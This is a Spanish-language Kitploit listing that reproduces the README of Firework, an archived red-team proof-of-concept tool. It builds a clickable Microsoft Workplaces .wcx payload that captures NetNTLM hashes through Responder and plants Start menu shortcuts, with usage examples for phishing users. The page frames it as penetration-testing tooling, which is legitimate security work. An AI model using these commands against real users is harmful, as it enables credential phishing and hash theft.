Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Firework — Firework es una herramienta de prueba de concepto para interactuar con Microsoft Workplaces creando archivos válidos necesarios para el proceso de aprovisionamiento. | Kitploit
Herramientas/GitHubGitHub/spiderlabs/firework
OSINT para Ingeniería SocialGeneración de PayloadsPhishingPruebas de PenetraciónComando y ControlIngeniería SocialAutenticaciónRed TeamingArchived
GitHubspiderlabs/firework

Firework

Firework es una herramienta de prueba de concepto para interactuar con Microsoft Workplaces creando archivos válidos necesarios para el proceso de aprovisionamiento.

43104hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web

: advertencia: NOTA: Esta herramienta ya no tiene mantenimiento activo.

Firework

alt text

Firework es una herramienta de prueba de concepto para interactuar con Microsoft Workplaces, creando archivos válidos necesarios para el proceso de aprovisionamiento. La herramienta también envuelve algo de código de Responder para aprovechar su capacidad de capturar hashes NetNTLM de un sistema que aprovisiona una fuente de Workplace a través de ella.

Esta herramienta puede ser utilizada como parte de una prueba de penetración o un ejercicio de equipo rojo para crear un payload .wcx (y su fuente asociada) que, si se hace clic en él, podría usarse para:

  • Phishing de credenciales - Los hashes NetNTLM se enviarán si un usuario ingresa sus credenciales (o en versiones anteriores de Windows automáticamente).
  • Agregar elementos al menú Inicio - Después de la configuración, se agregan accesos directos al menú Inicio que ejecutan los archivos RDP servidos. Estas entradas podrían usarse potencialmente como parte de una campaña de ingeniería social más amplia.
  • Descargar recursos - Recursos como los archivos .rdp y los archivos de iconos son descargados y actualizados por Windows a diario (si la autenticación de la fuente está deshabilitada o se cumple).

Lea el blog de SpiderLabs para un resumen más detallado y un tutorial.

Instalación

  • Probado con Python 2.7.x. (Python3 no es compatible actualmente, aunque la clase principal de Firework podría usarse en Python 3)
root@kitploit:~
$ pip install -r requirements.txt
  • La herramienta sirve contenido a través de HTTPS y requiere un certificado y una clave privada para usar el servidor web integrado con captura NetNTLM. Archivos por defecto: cert.crt y key.pem

Uso

root@kitploit:~

.-:::::'::::::::::..  .,::::::.::    .   .:::  ...    :::::::..    :::  .   
;;;'''' ;;;;;;;``;;;; ;;;;''''';;,  ;;  ;;;'.;;;;;;;. ;;;;``;;;;   ;;; .;;,.
[[[,,== [[[ [[[,/[[['  [[cccc  '[[, [[, [[',[[     \[[,[[[,/[[['   [[[[[/'  
`$$$"`` $$$ $$$$$$c    $$""""    Y$c$$$c$P $$$,     $$$$$$$$$c    _$$$$,    
 888    888 888b "88bo,888oo,__   "88"888  "888,_ _,88P888b "88bo,"888"88o, 
 "MM,   MMM MMMM   "W" """"YUMMM   "M "M"    "YMMMMMP" MMMM   "W"  MMM "MMP"


usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
                   [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
                   [-t CERT] [-k KEY]

Herramienta de Workplace WCX

argumentos opcionales:
  -h, --help            muestra este mensaje de ayuda y sale
  -c COMPANY, --company COMPANY
                        Nombre de la empresa
  -u URL, --url URL     URL de la fuente
  -a APP, --app APP     Nombre de la aplicación
  -e EXT, --ext EXT     Extensión de la aplicación
  -i ICON, --icon ICON  Icono de la aplicación
  -l LISTEN, --listen LISTEN
                        Puerto del servidor web TLS
  -r RDP, --rdp RDP     Servidor RDP
  -d DOMAIN, --domain DOMAIN
                        Dominio RDP
  -n USERNAME, --username USERNAME
                        Usuario RDP
  -p PASSWORD, --password PASSWORD
                        Contraseña RDP
  -t CERT, --cert CERT  Certificado SSL
  -k KEY, --key KEY     Clave SSL

Ejemplos

Ejemplo básico:

  • Nombre de la organización: EvilCorp
  • URL del XML de la fuente (o URL del servidor incorporado de Firework): https://example.org/ - Aquí es desde donde Windows descarga la fuente.
  • Nombre de la aplicación: Firework
  • Extensión de archivo: .fwk
  • Archivo de icono: firework.ico
root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico 

El servidor web incorporado se iniciará en el puerto 443 si cert.crt y key.pem están presentes en el directorio actual. Esto forzará un desafío NTLM con responder. Si estos archivos no están presentes, la herramienta escribirá todos los archivos en el directorio local para que los alojes por tu cuenta.

Si deseas iniciar el servidor web incorporado en un puerto alternativo, usa el flag -l como se muestra a continuación:

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443

También puedes agregar algunas personalizaciones al archivo .rdp que se sirve.

  • Servidor de Escritorio Remoto: dc.corp.local
  • Dominio: corp.local
  • Usuario: admin
  • Contraseña Cifrada: Contraseña cifrada que se incluye en el archivo RDP

Nota: Las contraseñas almacenadas en archivos .rdp probablemente se ignoran en una configuración predeterminada.

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <contraseña cifrada>

Payload

Después de ejecutar la herramienta, se escribirá 'payload.wcx' en el directorio actual. Este archivo es el que, al hacer clic, inicia el proceso de aprovisionamiento.

Autores

  • David Middlehurst - Twitter- @dtmsecurity

Licencia

Firework

Creado por David Middlehurst Copyright (C) 2018 Trustwave Holdings, Inc.

Este programa es software libre: puedes redistribuirlo y/o modificarlo bajo los términos de la Licencia Pública General de GNU tal como fue publicada por la Free Software Foundation, ya sea la versión 3 de la Licencia, o (a tu elección) cualquier versión posterior.

Este programa se distribuye con la esperanza de que sea útil, pero SIN NINGUNA GARANTÍA; sin siquiera la garantía implícita de COMERCIABILIDAD o ADECUACIÓN PARA UN PROPÓSITO PARTICULAR. Ver la Licencia Pública General de GNU para más detalles.

Agradecimientos

  • Responder de Laurent Gaffie
  • Icono de Firework
Descargar herramienta